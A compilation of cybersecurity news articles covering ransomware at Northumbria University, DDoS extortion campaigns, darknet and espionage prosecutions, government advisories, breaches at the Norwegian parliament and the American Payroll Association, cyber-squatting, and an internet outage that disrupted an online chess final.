Info Security
Northumbria Uni Campus Closed After Serious Cyber-Attack
Northumbria University is still reeling from a cyber-attack which forced it to reschedule exams and close its entire campus in Newcastle-Upon-Tyne.
Deputy vice chancellor, Peter Francis, told students on Monday that the “cyber incident” had caused “significant operational disruption” and that work was underway to restore IT systems as quickly as possible.
“For the remainder of this week, there will be no student access to campus whilst we work on restoring our network and connected services,” he continued.
“During the time it will take to restore our key systems, which we hope will be short, you will not have access to the student portal, blackboard and potentially other university platforms which you use in your day-to-day studies. We have temporarily switched these services off as a precautionary measure.”
The university also tweeted last week that exams had to be cancelled and that it was unable to take calls about clearing, a vital part of the academic calendar in which UK universities and colleges seek to fill places they still have on courses.
Although not officially named, the attack bears all the hallmarks of ransomware. Financially motivated cyber-criminals have been increasingly focusing on the education sector of late as institutions are thought to be more exposed to attacks and under tremendous commercial pressure to ensure uptime for staff and students.
Data released last month revealed that a third of UK universities have been attacked with ransomware in the past decade.
Most recently, a ransomware outage and data breach at US IT services company Blackbaud affected countless educational institutions in the UK and elsewhere. It’s not known if the Northumbria University attack also featured data theft.
Webroot senior threat research analyst, Kelvin Murray, argued that the distributed nature of many university networks makes them hard to manage and secure.
“To get to grips with cybersecurity, institutions need to engage cyber-resilience plans to protect their IT infrastructure and data, regardless of the crisis. IT teams must properly audit all machines connected to their networks and the data they hold,” he added.
“Security awareness training should be implemented for staff and students from day one, ensuring that they are vigilant in scrutinizing the emails they receive. This should be underpinned by cybersecurity technology such as email filtering, anti-virus protection, and sensible password policies.”
Global DDoS Extorters Demand Ransom from Firms
Security experts are warning of a new global DDoS-related extortion campaign targeting businesses operating in the e-commerce, finance and travel sectors.
Radware said it had been tracking the threat actors since mid-August, with victims in North America, APAC and EMEA. Emails are typically delivered claiming to come from state-sponsored groups such as Fancy Bear and Lazarus Group, as well as the “Armada Collective.”
The latter group has been linked to similar extortion emails sent in previous years.
The ransom emails threaten to launch DDoS attacks against the recipient organization of over 2Tbps, if payment of anywhere between 10 and 20BTC ($113,000-226,000) is not made. They also threaten to increase the ransom by 10BTC for each deadline missed.
Also included in the messages are the Autonomous System Numbers (ASNs) or IP addresses of servers or services that the group says it will target if their demands are not met.
“In follow-up messages, threat actors underscore that the unique Bitcoin address from the initial letter is still empty and reiterate the seriousness of the threat. They also provide keywords and organization names so the target organization can search for recent DDoS disruptions, followed by the rhetorical question ‘You don't want to be like them, do you?’,” Radware explained.
“In many cases the ransom threat is followed by cyber-attacks ranging from 50Gbps to 200Gbps. The attack vectors include UDP and UDP-Frag floods, some leveraging WS-Discovery amplification, combined with TCP SYN, TCP out-of-state, and ICMP Floods.”
Recipients of the emails were urged not to pay the ransom.
At the same time, Radware claimed to have observed multiple European ISPs being hit by DNS DDoS attacks since last week, although there’s no obvious link to the ransom campaign.
A group using the name “Armada Collective” tried a similar ransom ploy back in 2016, when Cloudflare claimed that it had heard from 100 customers who had received extortion threats and demands for payment of 10-50BTC.
A year later, Infosecurity reported on a group calling itself “Phantom Squad,” which copied the same trick.
Darknet Moderator Jailed for 11 Years
An American who was employed to moderate disputes on an illegal darknet marketplace has been sentenced to 11 years in prison.
Bryan Connor Herrell, of Aurora, Colorado, was hired by AlphaBay to settle arguments between vendors and purchasers.
The site operated by his employers facilitated hundreds of thousands of illicit transactions in which guns, drugs, credit cards numbers, and stolen identities were purchased along with other illegal contraband.
At the time of Herrell's involvement with AlphaBay, the site was the world's largest online marketplace for drugs.
Herrell was also hired to acted as a scam monitor, watching out for attempts by vendors to defraud AlphaBay's users.
The 26-year-old worked for the illegal website under the names "Penissmith" and "Botah." In return for his efforts, he was paid in Bitcoin.
Alexandre Cazes, the alleged founder of AlphaBay, was indicted by a Fresno grand jury on June 1, 2017.
On July 5, 2017, the Royal Thai Police executed an arrest warrant for Canadian-born Cazes at his residence in Bangkok, in connection with his alleged involvement with AlphaBay. The warrant was executed with assistance from the FBI and DEA.
When Cazes was arrested, police found his laptop open and in an unencrypted state. A search of the laptop by law enforcement agents and officers revealed several text files that identified the passwords/passkeys for the AlphaBay website, the AlphaBay servers, and other online identities associated with AlphaBay.
Cazes died in Thailand in the custody of the Narcotics Suppression Bureau just days after his arrest. The 26-year-old's death occurred an hour before he was due to meet with public prosecutors over proceedings relating to his extradition to the United States.
The US indictment against Cazes was dismissed following his death; however, the Department of Justice's investigation of AlphaBay and its former administrators is ongoing.
“This sentence serves as further proof that criminals cannot hide behind technology to break the law,” said US Attorney McGregor Scott of the Eastern District of California.
“Operating behind the veil of the darknet may seem to offer shelter from criminal investigations, but people should think twice before ordering or selling drugs online—you will be caught."
CISA Funds SLTT Cybersecurity Project
It was announced today that state, local, tribal, and territorial (SLTT) government organizations in the United States are to receive extra support to improve their cybersecurity.
Help is coming in the form of a 12-month project funded by CISA that will enable SLTT security teams to boost their cyber-defenses with an additional layer of secure Domain Name System (DNS) security.
The US Department of Homeland Security's Cybersecurity Infrastructure Security Agency (CISA) has joined forces with Akamai and the Center for Internet Security (CIS) to offer SLTTs fully managed proactive domain security.
The Malicious Domain Blocking and Reporting (MDBR) service will help SLTTs to better protect their applications accessing web servers and external mail servers, and to enhance their existing network defenses.
MDBR technology acts as a blocker, limiting the risk of infections associated with malware, ransomware, and phishing by preventing IT systems from connecting to malicious web domains.
The service also staves off attacks by stopping malicious actions from communicating with their associated command and control server or domain.
"The MDBR service is based on proven, effective, and easy-to-deploy technology that is designed to quickly help SLTT security teams improve their current security defenses," said Patrick Sullivan, VP and CTO of security strategy at Akamai.
"The real-time threat intelligence in MDBR is based on Akamai's unprecedented global visibility into web and DNS traffic, which is key to enable us to proactively defend against today's evolving threat landscape that SLTT security teams face."
Under the project, the MDBR service will be available at no cost to members of the CIS Multi-State Information Sharing and Analysis Center (MS-ISAC) and Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC®).
"MDBR is built on top of Akamai's Enterprise Threat Protector (ETP) service, which is deployed on its platform that provides carrier-grade recursive DNS service," said Ed Mattison, CIS executive vice president of operations and security services.
"The Akamai Intelligent Edge Platform delivers up to 2.2 trillion DNS queries daily, making it a great partner for this initiative."
To use the service, an organization just has to spend a few minutes pointing its DNS requests to Akamai's DNS servers.
NCSC Releases Cyber-Guidance
The UK’s National Cyber Security Centre (NCSC) has teamed up with international allies to issue guidelines on how organizations can stay safe from malicious cyber-actors.
The joint cybersecurity advisory "Technical Approaches to Uncovering and Remediating Malicious Activity" was published today in conjunction with the US’s Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre, the New Zealand National Cyber Security Centre and CERT NZ, and the Canadian Communications Security Establishment.
Contained within the advisory are a series of technical approaches that organizations can take to protect their most critical digital assets. The approaches, which are based on best practices, can help to uncover malicious activity and mitigate attacks, if followed.
NCSC director of operations Paul Chichester described cybersecurity as a "global issue that requires a collaborative international effort."
“This advisory will help organizations understand how to investigate cyber incidents and protect themselves online, and we would urge them to follow the guidance carefully," said Chichester.
“Working closely with our allies, and with the help of organizations and the wider public, we will continue to strengthen our defenses to make us the hardest possible target for our adversaries.”
Key takeaways from the advisory include a recommendation to respond to any potential cyber-incidents by first collecting relevant artifacts, lots, and data and removing them for further analysis.
Organizations were further advised to avoid tipping off any cyber-adversaries that their presence had been detected on the network and to contemplate seeking help from a third-party IT security organization.
CISA director Chris Krebs said that the joint alert was the first of its kind issued by CISA since the organization was formally established in 2018 and was something that he had "aimed for since day one."
“With our allied cybersecurity government partners, we work together every day to help improve and strengthen the cybersecurity of organizations and sectors of our economy that are increasingly targeted by criminals and nation states alike," said Krebs.
“Fortunately, there's strength in numbers, and this unified approach to combining our experiences with a range of malicious actors means that we're able to extend our defensive umbrella on a global scale.”
One-Third of Companies Put Sensitive Data at Risk Through Internet Exposure
A third (33%) of companies in the digital supply chain expose unsafe network services to the internet, putting sensitive data at risk, according to a new report published today by RiskRecon and the Cyentia Institute.
Following an assessment of millions of internet-facing systems across approximately 40,000 commercial and public institutions, it was found that datastores, such as S3 buckets and MySQL databases, are most commonly exposed to the internet. This was followed by remote access services, which is especially concerning given the shift to home working that has taken place during the COVID-19 pandemic.
Education was the sector most likely to expose unsafe network services to the internet, with 51.9% of universities running unsafe services on non-student systems.
The study also revealed there was significant geographic variation, with the Ukraine, Indonesia, Bulgaria, Mexico and Poland having the highest rate of domestically-hosted systems running unsafe services.
Additionally, there was a correlation between exposed unsafe services to the internet and wider critical security issues in the digital supply chain. For instance, failure to patch software and implement web encryption were noted as two of the most prevalent security findings associated with unsafe services.
The study authors added that the impact is exacerbated when vendors and business partners run unsafe, exposed services used by their digital supply chain customers.
Kelly White, CEO of co-founder at RiskRecon commented: “Blocking internet access to unsafe network services is one of the most basic security hygiene practices. The fact that one-third of companies in the digital supply chain are failing at one of the most basic cybersecurity practices should serve as a wake-up call to executives’ third-party risk management teams.
“We have a long way to go in hardening the infrastructure that we all depend on to safely operate our businesses and protect consumer data. Risk managers will be well served to leverage objective data to better understand and act on their third-party risk.”
Chinese Professor Jailed for Stealing US Trade Secrets
A Chinese university professor has been handed an 18-month jail sentence for stealing IP from two US companies several years ago.
Hao Zhang was charged in 2015 along with five other Chinese nationals with economic espionage and theft of trade secrets. While the five remain at large, most likely in China, Zhang made the mistake of re-entering the US and was promptly arrested.
He is said to have met one of the co-conspirators, Wei Pang, while the two were studying doctorates in electrical engineering at a California university.
They researched DARPA-funded R&D projects into thin-film bulk acoustic resonator (FBAR) technology, which is said to have multiple military and defense applications, and then went on to work on FBAR projects at Avago Technologies and Skyworks Solutions.
Then in around 2006-7, the two, along with four other conspirators, elicited interest in their work from state-backed Tianjin University and other organizations.
The university agreed to support their plan and in 2009 they resigned from their US roles and accepted full time positions as professors at Tianjin.
Later they formed a joint venture with the university under the name ROFS Microsystems to mass produce FBAR, according to the Department of Justice.
They were accused of stealing “recipes, source code, specifications, presentations, design layouts” and other confidential documents from Skyworks and Avago in order to build a state-of-the-art production facility and win commercial and military contracts.
The case will further bolster US suspicions that Chinese students in the country are a national security threat, whether they have been persuaded by Beijing to steal on behalf of the Communist Party, or are doing so for their own commercial benefit.
The seven-year prosecution of Zhang ended this week with the professor sentenced to a minimum security prison in California and ordered to pay $477,000 to the companies he stole from.
TLS Certificates Now Have 398 Day Lifespans
As of September, all publicly trusted TLS certificates must have a lifespan of 398 days or fewer.
According to a statement from Apple from March, where it announced it was “reducing the maximum allowed lifetimes of TLS server certificates” as part of its ongoing efforts to improve web security.
The Apple statement claimed TLS server certificates issued on or after September 1, 2020 “must not have a validity period greater than 398 days.” Specifically, this change will affect only TLS server certificates issued from the Root CAs preinstalled with iOS, iPadOS, macOS, watchOS, and tvOS.
Also, this change will affect only TLS server certificates issued on or after September 1, 2020; any certificates issued prior to that date will not be affected by this change. “Connections to TLS servers violating these new requirements will fail,” the statement said. “This might cause network and app failures and prevent websites from loading.”
Apple recommended certificates be issued with a maximum validity of 397 days, and this change will not affect certificates issued from user-added or administrator-added Root CAs.
According to Venafi, the interval between changes in the length of certificate lifespans has been shrinking over the last decade. It found that before 2011, certificate lifespans were 8–10 years (96 months) and their lifespans were gradually reduced over the past decade, to five years and then to three years in 2015 and ultimately to 13 months, a reduction of 51% in 2020.
“Apple’s unilateral move to reduce machine identity lifespans will profoundly impact businesses and governments globally,” said Kevin Bocek, vice president of security strategy and threat intelligence at Venafi.
“The interval between certificate lifecycle changes is shrinking, while at the same time, certificates lifecycles themselves are being reduced. In addition, the number of machines—including IoT and smart devices, virtual machines, AI algorithms and containers—that require machine identities is skyrocketing.”
He went on to claim that if the interval between lifecycle changes continues on its current cadence, it’s likely that we could see certificate lifespans for all publicly trusted TLS certificates reduced to six months by early 2021, and perhaps become as short as three months by the end of next year.
“Actions by Apple, Google or Mozilla could accomplish this,” he said. “Ultimately, the only way for organizations to eliminate this external, outside risk is total visibility, comprehensive intelligence and complete automation for TLS machine identities.”
CISA: No US Voter Registration Breaches This Year
The head of the US Cybersecurity and Infrastructure Security Agency (CISA) has been forced to deny Russian reports that US voter registration information has been circulating on the dark web.
Russian newspaper Kommersant claimed in a story yesterday that a database of 7.6 million Michigan voters was posted to the dark web, as well as millions more related to voters from Florida, Connecticut, North Carolina and Arkansas.
However, the Michigan Department of State responded swiftly to the story, reportedly confirming that the data in question was publicly available via Freedom of Information (FOI) requests.
In a statement on Twitter a few hours ago, CISA director, Chris Krebs, joined the official debunking of the claims.
“My main takeaway: it’s going to be critical over the next few months to maintain our cool and not spin up over every claim. The last measure of resilience is the American voter,” he said.
An official statement from the CISA and FBI claimed the two “have not seen cyber-attacks this year on voter registration databases or on any systems involving voting.”
“Information on US elections is going to grab headlines, particularly if it is cast as foreign interference. Early, unverified claims should be viewed with a healthy dose of skepticism,” it continued.
“More importantly, we encourage voters to look to trusted sources of information, in this case state election officials who have correctly pointed out that a lot of voter registration data is publicly available or easily purchased.”
The incident came as Facebook and Twitter took action to remove the social media profiles associated with Russian ‘news’ site PeaceData, which has been linked to the notorious state-backed misinformation-peddler the Internet Research Agency (IRA).
In Facebook’s case it involved taking down 13 Facebook accounts and two pages.
“This activity focused primarily on the US, UK, Algeria and Egypt, in addition to other English-speaking countries and countries in the Middle East and North Africa,” it said. “We began this investigation based on information about this network’s off-platform activity from the FBI. Our internal investigation revealed the full scope of this network on Facebook.”
CEOs Could Face Jail Time for IoT Attacks by 2024
Corporate CEOs could soon be personally liable if they fail to adequately secure IT systems connected to the physical world, Gartner has warned.
The analyst firm predicted that as many as 75% of business leaders could be held liable by 2024 due to increased regulations around so-called “cyber-physical systems” (CPSs) such as IoT and operational technology (OT).
Gartner defines CPSs as “engineered to orchestrate sensing, computation, control, networking and analytics to interact with the physical world, including humans.”
In this world, cyber-attacks can lead to human fatalities rather than mere data loss or service outages. For example, a medical device could be hijacked to prevent life-saving drugs from being dispensed, or a connected car could be remotely directed to crash.
Gartner argued that the financial impact of such attacks on CPSs resulting in fatalities could reach as much as $50 billion by 2023.
“Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them,” said Katell Thielemann, research vice president at Gartner.
“In the US, the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry. Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies.”
However, at present, many business leaders aren’t even aware of the scale of CPS investment in their organization, often because projects have happened outside of the control of IT, said Gartner.
This is where technology leaders in the organization must step up to help CEOs understand the risks that CPSs represent, and why more budget needs to be allocated to operational resilience management (ORM) in order to secure them, argued Thielemann.
“The more connected CPSs are, the higher the likelihood of an incident occurring,” she added.
US Jails Racist Cyber-stalker
A white supremacist from Florida has been sentenced to 41 months in prison for threatening an African American who announced his candidacy for city council; he was also convicted of cyber-stalking another victim.
In April 2020, Daniel McMahon pleaded guilty to using social media platform Gab to threaten a man identified in court as D.G. after learning in January 2019 that D.G. planned to run for Charlottesville City Council in Virginia.
McMahon also admitted using Facebook messaging app Messenger to cyber-stalk a female political activist described in court documents as Victim 2.
Using a Facebook account in which he called himself "Restore Silent Sam," McMahon threatened to sexually assault Victim 2's daughter, a minor who has been diagnosed with autism.
The convicted cyber-stalker admitted that, at around the same time that he was sending these threats to Victim 2, he was searching online for content relating to sexual contact with girls who have autism.
McMahon masked his identity while online by using the pseudonyms “Jack Corbin,” “Pale Horse,” “Restore Silent Sam,” and “Dakota Stone." Under these names, the 32-year-old actively promoted white supremacy, posted racial slurs, and expressed support for racially motivated violence.
“Americans have the right to run for office in this country without facing racially-bigoted threats of violence,” said Assistant Attorney General Eric Dreiband for the Civil Rights Division.
“Furthermore, no American should have to live with hateful threats of sexual violence."
Following his term of incarceration, McMahon will be placed on three years of supervised release, during which time he will be prohibited from using internet-capable devices without prior court approval.
“The hallmark of our Nation’s democracy is the right to peacefully protest and engage in an effective exchange of ideas via the political process,” said US Attorney Maria Chapa Lopez for the Middle District of Florida.
“When either of these rights are infringed [upon], and individuals are targeted, intimidated, or threatened because of their race/ethnicity or beliefs, the cornerstone of our system is put at risk. Today’s sentence demonstrates our intent to work together to preserve our Nation’s founding principles and ensure that all citizens are protected under the law."
Cyber-Attack on Norwegian Parliament
A number of ministers have had their email accounts hacked in a cyber-attack on Norway's parliament, the Storting.
The Norwegian parliament's director, Marianne Andreassen, confirmed that threat actors had targeted the parliament last week.
"This has been a significant attack," Andreassen said.
Unauthorized individuals managed to gain access to the email accounts of several elected members of parliament and also to some accounts belonging to parliament employees.
Speaking at a press conference earlier today, Andreassen did not specify how many accounts had been hacked but said that a "limited number" of ministers and employees had been impacted by the incident.
Individuals whose accounts were exposed in the attack have been informed, and a report has been filed with the Norwegian police.
A spokesman for Norway's main opposition party, the Labour Party, told public broadcaster NRK that the attack had impacted several Labour Party members and staff.
After the incident was discovered, the Norwegian National Security Authority (NSA) was brought in to counter the attack and get to the bottom of what had happened
"We have been involved for a few days," said NSA spokesman Trond Oevstedal. "We are assisting parliament with analysis and technical assistance."
Andreassen said that the parliament had discovered "anomalies a little more than a week ago."
"A number of risk-reducing immediate measures were implemented to stop the attack," said Andreassen. "These measures had an immediate effect."
In a statement issued earlier today, the Storting said that the attackers had made off with an unspecified amount of information.
It read: "Burglary has been registered in the email accounts of a small number of parliamentary representatives and employees. Our analyses show that different amounts of data have been downloaded."
No information has been released regarding what kind of cyber-attack was perpetrated against the Norwegian parliament or who was responsible for it.
"We don't know who's behind it," Andreassen told reporters.
"We take the matter very seriously, and we have full attention to analyzing the situation to get an overall picture of the incident and the potential extent of damage."
The website of the Storting, Norway's single-chamber parliament, was functioning normally on Tuesday after news of the cyber-attack was released.
BlueVoyant Increases Cybersecurity Expertise Through New Board Appointments
Cybersecurity services company BlueVoyant has today announced a range of high profile appointments across its board of directors and advisory board.
With immediate effect, Deborah Plunkett and Ariel Litvin have joined the firm’s board of directors while Ronald Moultrie has been made vice president of its advisory board.
The appointments are designed to add substantial extra industry knowledge and experience to the business as it looks to continue its growth.
Plunkett is currently principle of the consultancy Plunkett Associates LLC, as well as senior fellow at Harvard and a professor at the University of Maryland. In more than 30 years as a cybersecurity leader, Plunkett has previously held the post of director of information assurance as the National Security Agency (NSA) and was on the National Security Council at the White House for two administrations.
Litvin, who is the CISO of a global multi-billion dollar private manufacturing company, has expertise in addressing complex business and compliance-related issues faced by modern organizations.
Moultrie, who is joining BlueVoyant’s advisory board, is currently on the boards of Altamira Technologies Corporation, iCapital Network, the National Intelligence University, Sequoia Inc. and The Better Angels Society in addition to being senior advisor to MITRE, Pallas, and Resolute Consulting. Previously, Moultrie was a senior national security official who spent over three decades serving the US government. He has also held a senior position at the Central Intelligence Navy (CIA) and was the NSA’s director of operations.
Jim Rosenthal, co-founder and CEO of BlueVoyant commented: “We are very excited to welcome Debora and Ariel to our Board and delighted that Ron has joined our Advisory Board.
“Breadth of skills, backgrounds and experiences make us a stronger company. Because of their extraordinary talent and accomplishments, the three people joining us have many cyber-related opportunities - we are really pleased that they have chosen to join BlueVoyant.”
Skimming Attack Hits American Payroll Association
The American Payroll Association (APA) has issued a data breach notification after being hit by a skimming attack.
Threat actors installed skimming malware on both the login web page of the APA website and the checkout section of the association's online store by exploiting a vulnerability in the APA’s content management system.
The data security incident was discovered "on or around July 13, 2020." An investigation by the APA's IT team uncovered unusual activity on the APA site dating back to May 13, 2020.
As a result of the attack, unauthorized individuals gained access to login credentials, personal information, including names and dates of birth, and individual payment card information.
A security incident notice sent to customers by the APA in August and signed by the association's senior director of government and public relations, Robert Wagner, states: "The unauthorized individuals gained access to login information (i.e., username and password) and individual payment card information (i.e., credit card information and associated data).
"By way of account access, the electronic fields that may have been accessed include: First and Last Names; Email Address; Job Title and Job Role; Primary Job Function and to whom you 'Report'; Gender; Date of Birth; Address (either business or personal), including country, province or state, city, and postal code; Company name and size; Employee Industry; Payroll Software used at Workplace; Time and Attendance software used at work."
Cyber-attackers were also able to access profile photos and social media username information contained in some accounts.
Since the attack, the APA has installed additional antivirus software on its servers, installed "the latest security patches from our content management system," and increased the frequency of patch implementation.
Victims of the data breach have been offered 12 months of free credit monitoring and $1,000,000 in identity theft insurance.
"The APA is an attractive target for Magecart attackers since their members have access to tools and systems that contain payroll data for millions of individuals. The attackers can brute force other payroll systems using the same stolen credentials to find other account takeover targets," commented Ameet Naik, security evangelist at PerimeterX.
Cyber-Criminals Mimicking Global Brand Domain Names to Launch Scams
Cyber-criminals are regularly mimicking the domain names of mainstream global brands to scam consumers, a practice known as cyber-squatting, according to a new study by Palo Alto Networks.
It found that the types of domains most commonly impersonated for malicious purposes relate to the most profitable companies worldwide, such as mainstream search engines and social media, financial, shopping, and banking websites. The primary purpose is to launch phishing attacks and scams on users in order to steal credentials or money.
Companies mimicked in the top 20 most abused domains in December 2019 based on adjusted malicious rate included PayPal, Apple, Netflix and Amazon.
Cyber-squatting is when domain names are registered that try to trick users into believing they are related to existing brands, typically by intentionally misspelling variants of their names. Whilst not always done with malicious intent, many of these domains pose a cyber-risk to visitors, and the practice is illegal in the US.
According to Palo Alto Networks' analysis, 36.57% (5104) of squatted domain names registered in December 2019 had evidence of association malicious URLs within the domain or utilizing bulletproof hosting, while 18.59% (2595) were found to be malicious as they distributed malware or conducted phishing attacks. In total, 13,857 squatting domains were registered in December 2019, working out to an average of 450 per month.
The cybersecurity firm added that it observed “a variety of malicious domains with different objectives” in the period from December 2019 to date. Examples included a domain related to Amazon (amazon -india[.]online) specifically targeting mobile users in India to steal user credentials, a domain related to Samsung (samsung eblya iphone [.]com) that aimed to steal credit card information by hosting Azorult malware and domains related to Walmart (walrmart 44[.]com) and Samsung (samsung pr0mo[.]online) that distributed potentially unwanted programs such as spyware and adware.
Palo Alto Networks commented: “Domain squatting techniques leverage the fact that users rely on domain names to identify brands and services on the Internet. These squatting domains are often used for nefarious activities, including phishing, malware and PUP distribution, C2 and various scams.”
It advised: “We recommend that enterprises block and closely monitor their traffic, while consumers should make sure that they type domain names correctly and double-check that the domain owners are trusted before entering any site.”
Chinese Researcher Arrested in Illegal Tech Theft Probe
A researcher at the University of California with ties to the People’s Liberation Army (PLA) has been arrested and charged after allegedly destroying evidence.
Chinese national Guan Lei, 29, of Alhambra, faces a maximum sentence of 20 years in a federal prison after being charged with deliberately destroying a hard drive in order to obstruct an FBI investigation.
Guan, who was in the US on a J-1 non-immigrant visa, was suspected of transferring software or technical data to China’s National University of Defense Technology (NUDT), and was also being investigated for apparently lying about his military ties on a 2018 visa application, and in interviews with officers.
He apparently later admitted to receiving military training and wearing military uniforms whilst at NUDT. That same university was placed on a US entity list after being “suspected of procuring US-origin items to develop supercomputers with nuclear explosive applications,” according to an affidavit.
It is also claimed that one of Guan’s faculty advisors at NUDT was also a lieutenant general in the PLA who developed computers used by the Chinese army and Air Force, as well as military weather forecasts and nuclear technology.
Guan is said to have been observed throwing a hard drive into a dumpster outside his apartment on July 25, shortly before attempting to board a flight to China.
According to the affidavit, the hard drive “was irreparably damaged and that all previous data associated with the hard drive appears to have been removed deliberately and by force.”
Guan refused a request by FBI officers to examine his laptop and was subsequently denied permission to board the plane.
The news comes amidst a US crackdown on Chinese students fuelled by suspicions that Beijing forces legitimate students to spy for their country and sneaks military operatives into the US as students to do the same.
In January, an indictment was issued for another former NUDT ‘student’, Yanqing Ye, who was subsequently found to be a PLA lieutenant, and Zaosong Zheng, who tried to smuggle biological research out of the US. Both were students in Boston.
Iranian Hackers Advertise on Dark Web
A suspected Iranian state-backed group appears to have been moonlighting to drive additional income, according to a new report from CrowdStrike.
The security vendor claimed that the newly discovered Pioneer Kitten has been active since at least 2017 and is mainly focused on stealing intelligence which would be strategically useful to Tehran.
However, it is more likely to be a contractor than directly government employed, according to CrowdStrike senior intelligence analyst, Alex Orleans. This is because there’s evidence that the group has recently been advertising its wares on underground forums, in particular, access to compromised networks.
“That activity is suggestive of a potential attempt at revenue stream diversification on the part of Pioneer Kitten, alongside its targeted intrusions in support of the Iranian government,” Orleans argued. As such, it usually targets healthcare, government, technology and defense firms.
The group itself is said to favor exploits of remote, internet-connected external services and open source tooling.
“The adversary is particularly interested in exploits related to VPNs and network appliances, including CVE-2019-11510, CVE-2019-19781, and most recently CVE-2020-5902; reliance on exploits such as these lends to an opportunistic operational model,” Orleans continued.
“Pioneer Kitten’s namesake operational characteristic is its reliance on SSH tunnelling, through open-source tools such as Ngrok and the adversary’s custom tool SSHMinion, for communication with implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP).”
Some of the listed CVEs exploited by the group tie to bugs in products from Pulse Secure and Citrix which were widely exploited earlier this year, notably in ransomware attacks.
Pioneer Kitten’s targets so far have been located mainly in North America and Israeli, according to CrowdStrike. The group is also known by the monikers “Parasite,” "UNC757,” and “Fox Kitten."
BEC Wire Transfer Losses Soar 48% in Q2 2020
Wire transfer losses from Business Email Compromise (BEC) have soared by over 48% from the previous quarter to hit an average of more than $80,000, according to Agari.
The security vendor’s findings were revealed in the latest Phishing Activity Trends Report from the Anti Phishing Working Group (APWG).
Agari noted that BEC losses involved in bank transfer attacks jumped significantly from the $54,000 recorded in the first quarter, although these accounted for just 18% of total attacks.
Gift cards were the most popular way for scammers to monetize attacks, with BEC attackers requesting these in two-thirds (66%) of raids. Cards from eBay, Google Play, Apple iTunes, and Steam Wallet accounted for the vast majority (70%) of attacks.
However, gift card scams don’t net attackers much: the average amount requested by scammers dropped from $1,453 in the first quarter of 2020 to $1,213. Just 16% of BEC attacks were recorded as requesting “payroll diversions,” down from 25% in Q3 2019.
Despite the majority of attacks targeting users with fairly modest requests for money, some groups are continuing to push the boundaries.
One Russian cybercrime group known as Cosmic Lynx demands an average of nearly $1.3 million per BEC attack, according to Agari. As previously reported by Infosecurity, the group has been involved in over 200 BEC campaigns since July 2019, targeting executives in 46 countries.
Agari has in the past also warned of BEC gangs from West Africa operating highly sophisticated campaigns.
According to the FBI’s annual report, BEC continued to be the biggest money-maker for cyber-criminals last year, accounting for over half of all losses to cybercrime.
BEC scammers made almost $1.8 billion in 2019, over half the $3.5 billion total, according to the FBI’s 2019 Internet Crime Report. That’s up from around $1.3bn and a total of $2.7bn in 2018.
Internet Outage Causes Chess Championship Draw
The final game in yesterday's online Chess Olympiad was declared a draw after a widespread internet outage interrupted play.
An issue at internet service provider CenturyLink has been blamed for global connectivity problems that disrupted the tournament and caused issues for Cloudflare, Hulu, Reddit, EA, Steam, the PlayStation Network, Xbox Live, Feedly, Discord, and dozens of other services on Sunday morning.
Competing chess teams from India and Russia had been battling it out for victory after a 3–3 tie in the first round when the outage struck. Two of the Indian players, Nihal Sarin and Divya Deshmukh, lost connection toward the end of the game, subsequently losing on time.
A spokesperson for the Olympiad said: "It is very unfortunate that technical difficulties got in the way of the final. Until that moment, the match between India and Russia had been one of the most thrilling and balanced seen at the 2020 Online Chess Olympiad."
The Russians were initially declared the winner of the competition, but the Indian team lodged an appeal.
"The Appeals Committee examined all the evidence provided by Chess.com, as well as information gathered from other sources about the Cloudflare crash that caused the outage. After being informed of their considerations and in absence of a unanimous verdict, the FIDE President made the decision to award Gold Medals to both teams," said the spokesperson.
The shared victory represents India's first ever win in a Chess Olympiad and Russia's first victory since 2002.
The historic tournament, which nowadays is battled out every two years, has been running 1927.
In a message shared on Twitter on Sunday morning, Cloudflare said it was "aware of network related issues caused by a third-party transit provider incident" and was "working to mitigate the problem."
"Today we saw a widespread Internet outage online that impacted multiple providers," said John Graham-Cumming, Cloudflare CTO. "Cloudflare's automated systems detected the problem and routed around them, but the extent of the problem required manual intervention as well."
CenturyLink confirmed to CNN that an IP outage impacting content delivery networks (CDNs) had occurred on Sunday morning. The company said that all services had been restored by 11:12 am ET.
Android Users Bugged by Fake Popups
Google Android users were pestered last week by a series of fake notifications popping up on their devices.
According to Paul Ducklin of Naked Security by Sophos', the string of phony popups first became an annoyance for users of the Google Hangouts app before bothering users of Microsoft Teams.
"Users all over the world, and therefore at all times of day (many users complained of being woken up unnecessarily), received spammy looking messages," wrote Ducklin in a blog post published on August 28.
"To be clear, it wasn’t Microsoft testing notifications in the Teams app for Android. The bogus alerts caught the software giant off guard, too."
From their content, the notifications don't appear to be malicious or criminal in intent. No dubious links or calls to action were included, with messages simply stating the header "FCM Messages" followed by the text "Test Notification!!!!"
Pondering the identity of the sender and their motive, Ducklin commented: "The messages did indeed look like some sort of test—but by whom, and for what purpose?
"The four exclamation points suggested someone of a hackerish persuasion—perhaps some sort of overcooked 'proof of concept' (PoC) aimed at making a point, sent out by someone who lacked the social grace or the legalistic sensitivity of knowing when to stop."
Ducklin suggests that the spate of fake notifications may be connected to a recent discovery made by a cybersecurity researcher and bug bounty hunter calling themself “Abbs.” On August 17, Abbs claimed to have earned $30K for identifying a coding vulnerability in numerous Android apps that could enable someone to highjack the Firebase Cloud Messaging (FCM) service.
Describing the weakness, Abbs exclaimed: "A malicious attacker could control the content of push notifications to any application that runs the FCM SDK and has its FCM server key exposed, and at the same time send these notifications to every single user of the vulnerable application!
"These notifications could contain anything the attacker wants including graphic/disturbing images (via the 'image': 'url-to-image' attribute) accompanied with any demeaning or politically inclined message in the notification!"
The author of the notifications, which were promptly halted by Google and Microsoft, has yet to be identified.